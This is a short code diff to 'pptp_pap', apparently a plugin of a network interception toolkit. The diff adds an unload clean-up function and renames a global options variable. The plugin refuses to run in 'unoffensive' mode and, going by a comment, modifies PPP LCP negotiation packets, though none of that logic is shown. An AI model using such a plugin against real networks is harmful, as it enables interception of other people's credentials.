@@ -44,6 +44,7 @@ struct ppp_lcp_header {
 int plugin_load(void *);
 static int pptp_pap_init(void *);
 static int pptp_pap_fini(void *);
+static int pptp_pap_unload(void *);
 
 static void parse_ppp(struct packet_object *po);
 static u_char *parse_option(u_char * buffer, u_char option, int16 tot_len);
@@ -62,6 +63,8 @@ struct plugin_ops pptp_pap_ops = {
    .init =              &pptp_pap_init,
    /* deactivation function */                     
    .fini =              &pptp_pap_fini,
+   /* clean-up function */
+   .unload =            &pptp_pap_unload,
 };
 
 /**********************************************************/
@@ -80,7 +83,7 @@ static int pptp_pap_init(void *dummy)
    (void) dummy;
 
    /* It doesn't work if unoffensive */
-   if (GBL_OPTIONS->unoffensive) {
+   if (EC_GBL_OPTIONS->unoffensive) {
       INSTANT_USER_MSG("pptp_pap: plugin doesn't work in UNOFFENSIVE mode\n");
       return PLUGIN_FINISHED;
    }
@@ -103,6 +106,14 @@ static int pptp_pap_fini(void *dummy)
    return PLUGIN_FINISHED;
 }
 
+static int pptp_pap_unload(void *dummy)
+{
+   /* variable not used */
+   (void) dummy;
+
+   return PLUGIN_UNLOADED;
+}
+
 /*********************************************************/
 
 /* Modify ConfigureRequest LCP packets */
